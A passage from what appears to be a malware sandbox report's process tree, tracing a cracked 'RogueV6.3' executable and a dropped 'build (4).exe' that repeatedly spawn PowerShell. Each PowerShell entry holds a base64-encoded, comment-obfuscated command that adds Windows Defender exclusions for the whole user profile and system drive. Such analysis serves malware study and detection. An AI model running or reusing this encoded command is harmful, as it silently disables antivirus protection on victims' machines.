        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        33⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        33⤵
        Executes dropped EXE
        
        PID:1420
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        33⤵
        Loads dropped DLL
        
        PID:1448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        34⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        34⤵
        Executes dropped EXE
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        34⤵
        Loads dropped DLL
        
        PID:2140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        35⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        35⤵
        Executes dropped EXE
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        35⤵
        Loads dropped DLL
        
        PID:1808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        36⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        36⤵
        Executes dropped EXE
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        36⤵
        Loads dropped DLL
        
        PID:1416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        37⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        37⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        37⤵
        Loads dropped DLL
        
        PID:2504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        38⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        38⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        38⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        39⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        39⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        39⤵
        Loads dropped DLL
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        40⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        40⤵
        Executes dropped EXE
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        40⤵
        Loads dropped DLL
        
        PID:2056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        41⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        41⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        41⤵
        Loads dropped DLL
        
        PID:2856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        42⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        42⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        42⤵
        Loads dropped DLL
        
        PID:2668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        43⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        43⤵
        Executes dropped EXE
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        43⤵
        Loads dropped DLL
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        44⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        44⤵
        Executes dropped EXE
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        44⤵
        Loads dropped DLL
        
        PID:760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        45⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        45⤵
        Executes dropped EXE
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        45⤵
        Loads dropped DLL
        
        PID:1576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        46⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        46⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        46⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        47⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        47⤵
        Executes dropped EXE
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        47⤵
        Loads dropped DLL
        
        PID:1736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        48⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        48⤵
        Executes dropped EXE
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        48⤵
        Loads dropped DLL
        
        PID:2968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        49⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        49⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        49⤵
        Loads dropped DLL
        
        PID:2112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        50⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        50⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        50⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        51⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        51⤵
        Executes dropped EXE
        
        PID:2460
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        51⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        52⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        52⤵
        Executes dropped EXE
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        52⤵
        Loads dropped DLL
        
        PID:2236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        53⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        53⤵
        Executes dropped EXE
        
        PID:2768
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        53⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        54⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        54⤵
        Executes dropped EXE
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        54⤵
        Loads dropped DLL
        
        PID:2984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        55⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        55⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        55⤵
        Loads dropped DLL
        
        PID:972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        56⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        56⤵
        Executes dropped EXE
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        56⤵
        Loads dropped DLL
        
        PID:2056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
